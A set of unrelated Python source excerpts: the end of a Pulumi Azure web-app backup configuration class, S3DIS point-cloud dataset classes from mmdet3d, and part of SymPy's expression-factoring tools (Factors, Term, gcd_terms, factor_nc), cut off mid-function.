'azure-nextgen:web:WebAppBackupConfigurationSlot',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'WebAppBackupConfigurationSlot':
"""
Get an existing WebAppBackupConfigurationSlot resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return WebAppBackupConfigurationSlot(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="backupName")
def backup_name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the backup.
"""
return pulumi.get(self, "backup_name")
@property
@pulumi.getter(name="backupSchedule")
def backup_schedule(self) -> pulumi.Output[Optional['outputs.BackupScheduleResponse']]:
"""
Schedule for the backup if it is executed periodically.
"""
return pulumi.get(self, "backup_schedule")
@property
@pulumi.getter
def databases(self) -> pulumi.Output[Optional[Sequence['outputs.DatabaseBackupSettingResponse']]]:
"""
Databases included in the backup.
"""
return pulumi.get(self, "databases")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
True if the backup schedule is enabled (must be included in that case), false if the backup schedule should be disabled.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="storageAccountUrl")
def storage_account_url(self) -> pulumi.Output[str]:
"""
SAS URL to the container.
"""
return pulumi.get(self, "storage_account_url")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
The system metadata relating to this resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
from __future__ import absolute_import
from pex.platforms import *
|
import numpy as np
from os import path as osp
from mmdet3d.core import show_result, show_seg_result
from mmdet3d.core.bbox import DepthInstance3DBoxes
from mmdet.datasets import DATASETS
from mmseg.datasets import DATASETS as SEG_DATASETS
from .custom_3d import Custom3DDataset
from .custom_3d_seg import Custom3DSegDataset
from .pipelines import Compose
@DATASETS.register_module()
class S3DISDataset(Custom3DDataset):
"""S3DIS Dataset for Detection Task.
This class is the inner dataset for S3DIS. Since S3DIS has 6 areas, we
often train on 5 of them and test on the remaining one. The one for
test is Area_5 as suggested in `GSDN <https://arxiv.org/abs/2006.12356>`_.
To concatenate 5 areas during training
`mmdet.datasets.dataset_wrappers.ConcatDataset` should be used.
Args:
data_root (str): Path of dataset root.
ann_file (str): Path of annotation file.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
box_type_3d (str, optional): Type of 3D box of this dataset.
            Based on the `box_type_3d`, the dataset will encapsulate the box
            in its original format and then convert it to `box_type_3d`.
            Defaults to 'Depth' in this dataset. Available options include:
- 'LiDAR': Box in LiDAR coordinates.
- 'Depth': Box in depth coordinates, usually for indoor dataset.
- 'Camera': Box in camera coordinates.
filter_empty_gt (bool, optional): Whether to filter empty GT.
Defaults to True.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
"""
CLASSES = ('table', 'chair', 'sofa', 'bookcase', 'board')
def __init__(self,
data_root,
ann_file,
pipeline=None,
classes=None,
modality=None,
box_type_3d='Depth',
filter_empty_gt=True,
test_mode=False):
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
modality=modality,
box_type_3d=box_type_3d,
filter_empty_gt=filter_empty_gt,
test_mode=test_mode)
def get_ann_info(self, index):
"""Get annotation info according to the given index.
Args:
index (int): Index of the annotation data to get.
Returns:
dict: annotation information consists of the following keys:
- gt_bboxes_3d (:obj:`DepthInstance3DBoxes`): \
3D ground truth bboxes
- gt_labels_3d (np.ndarray): Labels of ground truths.
- pts_instance_mask_path (str): Path of instance masks.
- pts_semantic_mask_path (str): Path of semantic masks.
"""
# Use index to get the annos, thus the evalhook could also use this api
info = self.data_infos[index]
if info['annos']['gt_num'] != 0:
gt_bboxes_3d = info['annos']['gt_boxes_upright_depth'].astype(
np.float32) # k, 6
gt_labels_3d = info['annos']['class'].astype(np.long)
else:
gt_bboxes_3d = np.zeros((0, 6), dtype=np.float32)
gt_labels_3d = np.zeros((0, ), dtype=np.long)
# to target box structure
gt_bboxes_3d = DepthInstance3DBoxes(
gt_bboxes_3d,
box_dim=gt_bboxes_3d.shape[-1],
with_yaw=False,
origin=(0.5, 0.5, 0.5)).convert_to(self.box_mode_3d)
pts_instance_mask_path = osp.join(self.data_root,
info['pts_instance_mask_path'])
pts_semantic_mask_path = osp.join(self.data_root,
info['pts_semantic_mask_path'])
anns_results = dict(
gt_bboxes_3d=gt_bboxes_3d,
gt_labels_3d=gt_labels_3d,
pts_instance_mask_path=pts_instance_mask_path,
pts_semantic_mask_path=pts_semantic_mask_path)
return anns_results
def get_data_info(self, index):
"""Get data info according to the given index.
Args:
index (int): Index of the sample data to get.
Returns:
dict: Data information that will be passed to the data \
preprocessing pipelines. It includes the following keys:
- pts_filename (str): Filename of point clouds.
- file_name (str): Filename of point clouds.
- ann_info (dict): Annotation info.
"""
info = self.data_infos[index]
pts_filename = osp.join(self.data_root, info['pts_path'])
input_dict = dict(pts_filename=pts_filename)
if not self.test_mode:
annos = self.get_ann_info(index)
input_dict['ann_info'] = annos
if self.filter_empty_gt and ~(annos['gt_labels_3d'] != -1).any():
return None
return input_dict
def _build_default_pipeline(self):
"""Build the default pipeline for this dataset."""
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='DEPTH',
shift_height=False,
load_dim=6,
use_dim=[0, 1, 2, 3, 4, 5]),
dict(
type='DefaultFormatBundle3D',
class_names=self.CLASSES,
with_label=False),
dict(type='Collect3D', keys=['points'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=True, pipeline=None):
"""Results visualization.
Args:
results (list[dict]): List of bounding boxes results.
out_dir (str): Output directory of visualization result.
show (bool): Visualize the results online.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
"""
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
data_info = self.data_infos[i]
pts_path = data_info['pts_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points = self._extract_data(i, pipeline, 'points').numpy()
gt_bboxes = self.get_ann_info(i)['gt_bboxes_3d']
gt_bboxes = gt_bboxes.corners.numpy() if len(gt_bboxes) else None
gt_labels = self.get_ann_info(i)['gt_labels_3d']
pred_bboxes = result['boxes_3d']
pred_bboxes = pred_bboxes.corners.numpy() if len(pred_bboxes) else None
pred_labels = result['labels_3d']
show_result(points, gt_bboxes, gt_labels,
pred_bboxes, pred_labels, out_dir, file_name, False)
class _S3DISSegDataset(Custom3DSegDataset):
r"""S3DIS Dataset for Semantic Segmentation Task.
This class is the inner dataset for S3DIS. Since S3DIS has 6 areas, we
often train on 5 of them and test on the remaining one.
However, there is not a fixed train-test split of S3DIS. People often test
on Area_5 as suggested by `SEGCloud <https://arxiv.org/abs/1710.07563>`_.
But many papers also report the average results of 6-fold cross validation
over the 6 areas (e.g. `DGCNN <https://arxiv.org/abs/1801.07829>`_).
Therefore, we use an inner dataset for one area, and further use a dataset
wrapper to concat all the provided data in different areas.
Args:
data_root (str): Path of dataset root.
ann_file (str): Path of annotation file.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
palette (list[list[int]], optional): The palette of segmentation map.
Defaults to None.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
ignore_index (int, optional): The label index to be ignored, e.g. \
unannotated points. If None is given, set to len(self.CLASSES).
Defaults to None.
scene_idxs (np.ndarray | str, optional): Precomputed index to load
            data. For scenes with many points, we may sample them several times.
Defaults to None.
"""
CLASSES = ('ceiling', 'floor', 'wall', 'beam', 'column', 'window', 'door',
'table', 'chair', 'sofa', 'bookcase', 'board', 'clutter')
VALID_CLASS_IDS = tuple(range(13))
ALL_CLASS_IDS = tuple(range(14)) # possibly with 'stair' class
PALETTE = [[0, 255, 0], [0, 0, 255], [0, 255, 255], [255, 255, 0],
[255, 0, 255], [100, 100, 255], [200, 200, 100],
[170, 120, 200], [255, 0, 0], [200, 100, 100], [10, 200, 100],
[200, 200, 200], [50, 50, 50]]
def __init__(self,
data_root,
ann_file,
pipeline=None,
classes=None,
palette=None,
modality=None,
test_mode=False,
ignore_index=None,
scene_idxs=None):
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs)
def get_ann_info(self, index):
"""Get annotation info according to the given index.
Args:
index (int): Index of the annotation data to get.
Returns:
dict: annotation information consists of the following keys:
- pts_semantic_mask_path (str): Path of semantic masks.
"""
# Use index to get the annos, thus the evalhook could also use this api
info = self.data_infos[index]
pts_semantic_mask_path = osp.join(self.data_root,
info['pts_semantic_mask_path'])
anns_results = dict(pts_semantic_mask_path=pts_semantic_mask_path)
return anns_results
def _build_default_pipeline(self):
"""Build the default pipeline for this dataset."""
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='DEPTH',
shift_height=False,
use_color=True,
load_dim=6,
use_dim=[0, 1, 2, 3, 4, 5]),
dict(
type='LoadAnnotations3D',
with_bbox_3d=False,
with_label_3d=False,
with_mask_3d=False,
with_seg_3d=True),
dict(
type='PointSegClassMapping',
valid_cat_ids=self.VALID_CLASS_IDS,
max_cat_id=np.max(self.ALL_CLASS_IDS)),
dict(
type='DefaultFormatBundle3D',
with_label=False,
class_names=self.CLASSES),
dict(type='Collect3D', keys=['points', 'pts_semantic_mask'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=True, pipeline=None):
"""Results visualization.
Args:
results (list[dict]): List of bounding boxes results.
out_dir (str): Output directory of visualization result.
show (bool): Visualize the results online.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
"""
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
data_info = self.data_infos[i]
pts_path = data_info['pts_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points, gt_sem_mask = self._extract_data(
i, pipeline, ['points', 'pts_semantic_mask'], load_annos=True)
points = points.numpy()
pred_sem_mask = result['semantic_mask'].numpy()
show_seg_result(points, gt_sem_mask,
pred_sem_mask, out_dir, file_name,
np.array(self.PALETTE), self.ignore_index, show)
def get_scene_idxs(self, scene_idxs):
"""Compute scene_idxs for data sampling.
We sample more times for scenes with more points.
"""
# when testing, we load one whole scene every time
if not self.test_mode and scene_idxs is None:
raise NotImplementedError(
'please provide re-sampled scene indexes for training')
return super().get_scene_idxs(scene_idxs)
@DATASETS.register_module()
@SEG_DATASETS.register_module()
class S3DISSegDataset(_S3DISSegDataset):
r"""S3DIS Dataset for Semantic Segmentation Task.
This class serves as the API for experiments on the S3DIS Dataset.
It wraps the provided datasets of different areas.
We don't use `mmdet.datasets.dataset_wrappers.ConcatDataset` because we
need to concat the `scene_idxs` of different areas.
Please refer to the `google form <https://docs.google.com/forms/d/e/1FAIpQL
ScDimvNMCGhy_rmBA2gHfDu3naktRm6A8BPwAWWDv-Uhm6Shw/viewform?c=0&w=1>`_ for
data downloading.
Args:
data_root (str): Path of dataset root.
ann_files (list[str]): Path of several annotation files.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
palette (list[list[int]], optional): The palette of segmentation map.
Defaults to None.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
ignore_index (int, optional): The label index to be ignored, e.g. \
unannotated points. If None is given, set to len(self.CLASSES).
Defaults to None.
scene_idxs (list[np.ndarray] | list[str], optional): Precomputed index
            to load data. For scenes with many points, we may sample them several
times. Defaults to None.
"""
def __init__(self,
data_root,
ann_files,
pipeline=None,
classes=None,
palette=None,
modality=None,
test_mode=False,
ignore_index=None,
scene_idxs=None):
# make sure that ann_files and scene_idxs have same length
ann_files = self._check_ann_files(ann_files)
scene_idxs = self._check_scene_idxs(scene_idxs, len(ann_files))
# initialize some attributes as datasets[0]
super().__init__(
data_root=data_root,
ann_file=ann_files[0],
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs[0])
datasets = [
_S3DISSegDataset(
data_root=data_root,
ann_file=ann_files[i],
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs[i]) for i in range(len(ann_files))
]
# data_infos and scene_idxs need to be concat
self.concat_data_infos([dst.data_infos for dst in datasets])
self.concat_scene_idxs([dst.scene_idxs for dst in datasets])
# set group flag for the sampler
if not self.test_mode:
self._set_group_flag()
def concat_data_infos(self, data_infos):
"""Concat data_infos from several datasets to form self.data_infos.
Args:
data_infos (list[list[dict]])
"""
self.data_infos = [
info for one_data_infos in data_infos for info in one_data_infos
]
def concat_scene_idxs(self, scene_idxs):
"""Concat scene_idxs from several datasets to form self.scene_idxs.
Needs to manually add offset to scene_idxs[1, 2, ...].
Args:
scene_idxs (list[np.ndarray])
"""
self.scene_idxs = np.array([], dtype=np.int32)
offset = 0
for one_scene_idxs in scene_idxs:
self.scene_idxs = np.concatenate(
[self.scene_idxs, one_scene_idxs + offset]).astype(np.int32)
offset = np.unique(self.scene_idxs).max() + 1
@staticmethod
def _duplicate_to_list(x, num):
"""Repeat x `num` times to form a list."""
return [x for _ in range(num)]
def _check_ann_files(self, ann_file):
"""Make ann_files as list/tuple."""
# ann_file could be str
if not isinstance(ann_file, (list, tuple)):
ann_file = self._duplicate_to_list(ann_file, 1)
return ann_file
def _check_scene_idxs(self, scene_idx, num):
"""Make scene_idxs as list/tuple."""
if scene_idx is None:
return self._duplicate_to_list(scene_idx, num)
# scene_idx could be str, np.ndarray, list or tuple
if isinstance(scene_idx, str): # str
return self._duplicate_to_list(scene_idx, num)
if isinstance(scene_idx[0], str): # list of str
return scene_idx
if isinstance(scene_idx[0], (list, tuple, np.ndarray)): # list of idx
return scene_idx
# single idx
return self._duplicate_to_list(scene_idx, num)
|
"""Tools for manipulating of large commutative expressions. """
from sympy.core.add import Add
from sympy.core.compatibility import iterable
from sympy.core.mul import Mul, _keep_coeff
from sympy.core.power import Pow
from sympy.core.basic import Basic
from sympy.core.expr import Expr
from sympy.core.function import expand_mul
from sympy.core.sympify import sympify
from sympy.core.numbers import Rational, Integer
from sympy.core.singleton import S
from sympy.core.symbol import Dummy
from sympy.core.coreerrors import NonCommutativeExpression
from sympy.core.containers import Tuple
from sympy.utilities import default_sort_key
from sympy.utilities.iterables import (common_prefix, common_suffix,
preorder_traversal, variations)
def decompose_power(expr):
"""
Decompose power into symbolic base and integer exponent.
Examples
========
>>> from sympy.core.exprtools import decompose_power
>>> from sympy.abc import x, y
>>> decompose_power(x)
(x, 1)
>>> decompose_power(x**2)
(x, 2)
>>> decompose_power(x**(2*y))
(x**y, 2)
>>> decompose_power(x**(2*y/3))
(x**(y/3), 2)
"""
base, exp = expr.as_base_exp()
if exp.is_Number:
if exp.is_Rational:
if not exp.is_Integer:
base = Pow(base, Rational(1, exp.q))
exp = exp.p
else:
base, exp = expr, 1
else:
exp, tail = exp.as_coeff_Mul(rational=True)
if exp is S.NegativeOne:
base, exp = Pow(base, tail), -1
elif exp is not S.One:
tail = _keep_coeff(Rational(1, exp.q), tail)
base, exp = Pow(base, tail), exp.p
else:
base, exp = expr, 1
return base, exp
class Factors(object):
"""Efficient representation of ``f_1*f_2*...*f_n``. """
__slots__ = ['factors', 'gens']
def __init__(self, factors=None):
if factors is None:
factors = {}
self.factors = factors
self.gens = frozenset(factors.keys())
def __hash__(self):
return hash((tuple(self.factors), self.gens))
def __repr__(self):
return "Factors(%s)" % self.factors
def as_expr(self):
args = []
for factor, exp in self.factors.iteritems():
if exp != 1:
b, e = factor.as_base_exp()
e = _keep_coeff(Integer(exp), e)
args.append(b**e)
else:
args.append(factor)
return Mul(*args)
def normal(self, other):
self_factors = dict(self.factors)
other_factors = dict(other.factors)
for factor, self_exp in self.factors.iteritems():
try:
other_exp = other.factors[factor]
except KeyError:
continue
exp = self_exp - other_exp
if not exp:
del self_factors[factor]
del other_factors[factor]
else:
if exp > 0:
self_factors[factor] = exp
del other_factors[factor]
else:
del self_factors[factor]
other_factors[factor] = -exp
return Factors(self_factors), Factors(other_factors)
def mul(self, other):
factors = dict(self.factors)
for factor, exp in other.factors.iteritems():
if factor in factors:
exp = factors[factor] + exp
if not exp:
del factors[factor]
continue
factors[factor] = exp
return Factors(factors)
def div(self, other):
quo, rem = dict(self.factors), {}
for factor, exp in other.factors.iteritems():
if factor in quo:
exp = quo[factor] - exp
if exp <= 0:
del quo[factor]
if exp >= 0:
if exp:
quo[factor] = exp
continue
exp = -exp
rem[factor] = exp
return Factors(quo), Factors(rem)
def quo(self, other):
return self.div(other)[0]
def rem(self, other):
return self.div(other)[1]
def pow(self, other):
if type(other) is int and other >= 0:
factors = {}
if other:
for factor, exp in self.factors.iteritems():
factors[factor] = exp*other
return Factors(factors)
else:
raise ValueError("expected non-negative integer, got %s" % other)
def gcd(self, other):
factors = {}
for factor, exp in self.factors.iteritems():
if factor in other.factors:
exp = min(exp, other.factors[factor])
factors[factor] = exp
return Factors(factors)
def lcm(self, other):
factors = dict(self.factors)
for factor, exp in other.factors.iteritems():
if factor in factors:
exp = max(exp, factors[factor])
factors[factor] = exp
return Factors(factors)
def __mul__(self, other):
if isinstance(other, Factors):
return self.mul(other)
else:
return NotImplemented
def __divmod__(self, other):
if isinstance(other, Factors):
return self.div(other)
else:
return NotImplemented
def __div__(self, other):
if isinstance(other, Factors):
return self.quo(other)
else:
return NotImplemented
__truediv__ = __div__
def __mod__(self, other):
if isinstance(other, Factors):
return self.rem(other)
else:
return NotImplemented
def __pow__(self, other):
if type(other) is int:
return self.pow(other)
else:
return NotImplemented
def __eq__(self, other):
return self.factors == other.factors
def __ne__(self, other):
return not self.__eq__(other)
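# A short doctest-style sketch of how Factors composes (x and y are assumed to
# be Symbols; dict ordering in the reprs may differ between runs):
#
#   >>> from sympy.abc import x, y
#   >>> a = Factors({x: 2, y: 3})
#   >>> b = Factors({x: 1})
#   >>> a.mul(b).factors == {x: 3, y: 3}
#   True
#   >>> a.gcd(b).factors == {x: 1}
#   True
#   >>> quo, rem = a.div(b)
#   >>> quo.factors, rem.factors
#   ({x: 1, y: 3}, {})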
class Term(object):
"""Efficient representation of ``coeff*(numer/denom)``. """
__slots__ = ['coeff', 'numer', 'denom']
def __init__(self, term, numer=None, denom=None):
if numer is None and denom is None:
if not term.is_commutative:
raise NonCommutativeExpression('commutative expression expected')
coeff, factors = term.as_coeff_mul()
numer, denom = {}, {}
for factor in factors:
base, exp = decompose_power(factor)
if base.is_Add:
cont, base = base.primitive()
coeff *= cont**exp
if exp > 0:
numer[base] = exp
else:
denom[base] = -exp
numer = Factors(numer)
denom = Factors(denom)
else:
coeff = term
if numer is None:
numer = Factors()
if denom is None:
denom = Factors()
self.coeff = coeff
self.numer = numer
self.denom = denom
def __hash__(self):
return hash((self.coeff, self.numer, self.denom))
def __repr__(self):
return "Term(%s, %s, %s)" % (self.coeff, self.numer, self.denom)
def as_expr(self):
return self.coeff*(self.numer.as_expr()/self.denom.as_expr())
def mul(self, other):
coeff = self.coeff*other.coeff
numer = self.numer.mul(other.numer)
denom = self.denom.mul(other.denom)
numer, denom = numer.normal(denom)
return Term(coeff, numer, denom)
def inv(self):
return Term(1/self.coeff, self.denom, self.numer)
def quo(self, other):
return self.mul(other.inv())
def pow(self, other):
if other < 0:
return self.inv().pow(-other)
else:
return Term(self.coeff ** other,
self.numer.pow(other),
self.denom.pow(other))
def gcd(self, other):
return Term(self.coeff.gcd(other.coeff),
self.numer.gcd(other.numer),
self.denom.gcd(other.denom))
def lcm(self, other):
return Term(self.coeff.lcm(other.coeff),
self.numer.lcm(other.numer),
self.denom.lcm(other.denom))
def __mul__(self, other):
if isinstance(other, Term):
return self.mul(other)
else:
return NotImplemented
def __div__(self, other):
if isinstance(other, Term):
return self.quo(other)
else:
return NotImplemented
__truediv__ = __div__
def __pow__(self, other):
if type(other) is int:
return self.pow(other)
else:
return NotImplemented
def __eq__(self, other):
return (self.coeff == other.coeff and
self.numer == other.numer and
self.denom == other.denom)
def __ne__(self, other):
return not self.__eq__(other)
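# A short sketch of how a single product is decomposed into a Term (x and y
# are assumed to be Symbols):
#
#   >>> from sympy.abc import x, y
#   >>> t = Term(3*x/y**2)
#   >>> t.coeff, t.numer.factors, t.denom.factors
#   (3, {x: 1}, {y: 2})
#   >>> t.inv().as_expr()
#   y**2/(3*x)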
def _gcd_terms(terms, isprimitive=False):
"""Helper function for :func:`gcd_terms`. If `isprimitive` is True then the
call to primitive for an Add will be skipped. This is useful when the
    content has already been extracted."""
if isinstance(terms, Basic) and not isinstance(terms, Tuple):
terms = Add.make_args(terms)
if len(terms) <= 1:
if not terms:
return S.Zero, S.Zero, S.One
else:
return terms[0], S.One, S.One
terms = map(Term, terms)
cont = terms[0]
for term in terms[1:]:
cont = cont.gcd(term)
for i, term in enumerate(terms):
terms[i] = term.quo(cont)
denom = terms[0].denom
for term in terms[1:]:
denom = denom.lcm(term.denom)
numers = []
for term in terms:
numer = term.numer.mul(denom.quo(term.denom))
numers.append(term.coeff*numer.as_expr())
cont = cont.as_expr()
numer = Add(*numers)
denom = denom.as_expr()
if not isprimitive and numer.is_Add:
_cont, numer = numer.primitive()
cont *= _cont
return cont, numer, denom
def gcd_terms(terms, isprimitive=False, clear=True):
"""
    Compute the GCD of ``terms`` and put them together. If ``isprimitive`` is
    True then ``_gcd_terms`` will not run the primitive method on the terms.
``clear`` controls the removal of integers from the denominator of an Add
    expression. When True, all numerical denominators will be cleared; when
False the denominators will be cleared only if all terms had numerical
denominators.
Examples
========
>>> from sympy.core import gcd_terms
>>> from sympy.abc import x, y
>>> gcd_terms((x + 1)**2*y + (x + 1)*y**2)
y*(x + 1)*(x + y + 1)
>>> gcd_terms(x/2 + 1)
(x + 2)/2
>>> gcd_terms(x/2 + 1, clear=False)
x/2 + 1
>>> gcd_terms(x/2 + y/2, clear=False)
(x + y)/2
"""
def mask(terms):
"""replace nc portions of each term with a unique Dummy symbols
and return the replacements to restore them"""
args = [(a, []) if a.is_commutative else a.args_cnc() for a in terms]
reps = []
for i, (c, nc) in enumerate(args):
if nc:
nc = Mul._from_args(nc)
d = Dummy()
reps.append((d, nc))
c.append(d)
args[i] = Mul._from_args(c)
else:
args[i] = c
return args, dict(reps)
terms = sympify(terms)
isexpr = isinstance(terms, Expr)
if not isexpr or terms.is_Add:
if isexpr: # hence an Add
terms = list(terms.args)
terms, reps = mask(terms)
cont, numer, denom = _gcd_terms(terms, isprimitive)
numer = numer.xreplace(reps)
coeff, factors = cont.as_coeff_Mul()
return _keep_coeff(coeff, factors*numer/denom, clear=clear)
if terms.is_Atom:
return terms
if terms.is_Mul:
c, args = terms.as_coeff_mul()
return _keep_coeff(c, Mul(*[gcd_terms(i, isprimitive, clear) for i in args]), clear=clear)
def handle(a):
if iterable(a):
if isinstance(a, Basic):
return a.func(*[gcd_terms(i, isprimitive, clear) for i in a.args])
return type(a)([gcd_terms(i, isprimitive, clear) for i in a])
return gcd_terms(a, isprimitive, clear)
return terms.func(*[handle(i) for i in terms.args])
def factor_terms(expr, radical=False, clear=False):
"""Remove common factors from terms in all arguments without
changing the underlying structure of the expr. No expansion or
simplification (and no processing of non-commutatives) is performed.
If radical=True then a radical common to all terms will be factored
out of any Add sub-expressions of the expr.
If clear=False (default) then coefficients will not be separated
from a single Add if they can be distributed to leave one or more
terms with integer coefficients.
Examples
========
>>> from sympy import factor_terms, Symbol, Mul, primitive
>>> from sympy.abc import x, y
>>> factor_terms(x + x*(2 + 4*y)**3)
x*(8*(2*y + 1)**3 + 1)
>>> A = Symbol('A', commutative=False)
>>> factor_terms(x*A + x*A + x*y*A)
x*(y*A + 2*A)
When clear is False, a fraction will only appear factored out of an
Add expression if all terms of the Add have coefficients that are
fractions:
>>> factor_terms(x/2 + 1, clear=False)
x/2 + 1
>>> factor_terms(x/2 + 1, clear=True)
(x + 2)/2
This only applies when there is a single Add that the coefficient
multiplies:
>>> factor_terms(x*y/2 + y, clear=True)
y*(x + 2)/2
>>> factor_terms(x*y/2 + y, clear=False) == _
True
"""
expr = sympify(expr)
is_iterable = iterable(expr)
if not isinstance(expr, Basic) or expr.is_Atom:
if is_iterable:
return type(expr)([factor_terms(i, radical=radical, clear=clear) for i in expr])
return expr
if expr.is_Pow or expr.is_Function or is_iterable or not hasattr(expr, 'args_cnc'):
args = expr.args
newargs = tuple([factor_terms(i, radical=radical, clear=clear) for i in args])
if newargs == args:
return expr
return expr.func(*newargs)
cont, p = expr.as_content_primitive(radical=radical)
list_args = [gcd_terms(a, isprimitive=True, clear=clear) for a in Add.make_args(p)]
p = Add._from_args(list_args) # gcd_terms will fix up ordering
p = gcd_terms(p, isprimitive=True, clear=clear)
return _keep_coeff(cont, p, clear=clear)
def _mask_nc(eq):
"""Return ``eq`` with non-commutative objects replaced with dummy
symbols. A dictionary that can be used to restore the original
values is returned: if it is None, the expression is
noncommutative and cannot be made commutative. The third value
returned is a list of any non-commutative symbols that appeared
in the equation.
Notes
=====
    All non-commutative objects (other than Symbols) will be replaced;
    if the only non-commutative objects are Symbols, and there is only
1 Symbol, it will be replaced; if there are more than one then
they will not be replaced; the calling routine should handle
replacements in this case since some care must be taken to keep
track of the ordering of symbols when they occur within Muls.
Examples
========
>>> from sympy.physics.secondquant import Commutator, NO, F, Fd
>>> from sympy import Dummy, symbols
>>> from sympy.abc import x, y
>>> from sympy.core.exprtools import _mask_nc
>>> A, B, C = symbols('A,B,C', commutative=False)
>>> Dummy._count = 0 # reset for doctest purposes
>>> _mask_nc(A**2 - x**2)
(_0**2 - x**2, {_0: A}, [])
>>> _mask_nc(A**2 - B**2)
(A**2 - B**2, None, [A, B])
>>> _mask_nc(1 + x*Commutator(A, B))
(_1*x + 1, {_1: Commutator(A, B)}, [A, B])
>>> _mask_nc(NO(Fd(x)*F(y)))
(_2, {_2: NO(CreateFermion(x)*AnnihilateFermion(y))}, [])
"""
expr = eq
if expr.is_commutative:
return eq, {}, []
# if there is only one nc symbol, it can be factored regularly but
# polys is going to complain, so replace it with a dummy
rep = []
nc_syms = [s for s in expr.free_symbols if not s.is_commutative]
if len(nc_syms) == 1:
nc = Dummy()
rep.append((nc_syms.pop(), nc))
expr = expr.subs(rep)
# even though the noncommutative symbol may be gone, the expression
# might still appear noncommutative; if it's a non-elementary object
# we will replace it, but if it is a Symbol, Add, Mul, Pow we leave
# it alone.
nc_syms.sort(key=default_sort_key)
if nc_syms or not expr.is_commutative:
pot = preorder_traversal(expr)
for i, a in enumerate(pot):
if any(a == r[0] for r in rep):
pass
elif (
not a.is_commutative and
not (a.is_Symbol or a.is_Add or a.is_Mul or a.is_Pow)
):
rep.append((a, Dummy()))
else:
continue # don't skip
pot.skip() # don't go any further
expr = expr.subs(rep)
return expr, dict([(v, k) for k, v in rep]) or None, nc_syms
def factor_nc(expr):
"""Return the factored form of ``expr`` while handling non-commutative
expressions.
    Examples
    ========
>>> from sympy.core.exprtools import factor_nc
>>> from sympy import Symbol
>>> from sympy.abc import x
>>> A = Symbol('A', commutative=False)
>>> B = Symbol('B', commutative=False)
>>> factor_nc((x**2 + 2*A*x + A**2).expand())
(x + A)**2
>>> factor_nc(((x + A)*(x + B)).expand())
(x + A)*(x + B)
"""
from sympy.simplify.simplify import _mexpand
from sympy.polys import gcd, factor
expr = sympify(expr)
if not isinstance(expr, Expr) or not expr.args:
return expr
if not expr.is_Add:
return expr.func(*[factor_nc(a) for a in expr.args])
expr, rep, nc_symbols = _mask_nc(expr)
if rep:
return factor(expr).subs(rep)
else:
args = [a.args_cnc() for a in Add.make_args(expr)]
c = g = l = r = S.One
hit = False
# find any commutative gcd term
for i, a in enumerate(args):
if i == 0:
c = Mul._from_args(a[0])
elif a[0]:
c = gcd(c, Mul._from_args(a[0]))
else:
c = S.One
if c is not S.One:
hit = True
c, g = c.as_coeff_Mul()
for i, (cc, _) in enumerate(args):
cc = list(Mul.make_args(Mul._from_args(list(cc))/g))
args[i][0] = cc
# find any noncommutative common prefix
for i, a in enumerate(args):
if i == 0:
n = a[1][:]
else:
n = common_prefix(n, a[1])
if not n:
# is there a power that can be extracted?
if not args[0][1]:
break
b, e = args[0][1][0].as_base_exp()
ok = False
if e.is_Integer:
for t in args:
if not t[1]:
break
bt, et = t[1][0].as_base_exp()
if et.is_Integer and bt == b:
e = min(e, et)
else:
break
else:
ok = hit = True
l = b**e
il = b**-e
for i, a in enumerate(args):
args[i][1][0] = il*args[i][1][0]
break
if not ok:
break
else:
hit = True
lenn = len(n)
l = Mul(*n)
